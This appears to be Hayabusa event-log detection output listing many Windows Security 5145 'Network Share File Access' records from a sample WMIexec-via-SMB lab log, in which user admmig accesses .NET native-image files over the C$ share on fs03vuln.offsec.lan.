10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e : IP Address: 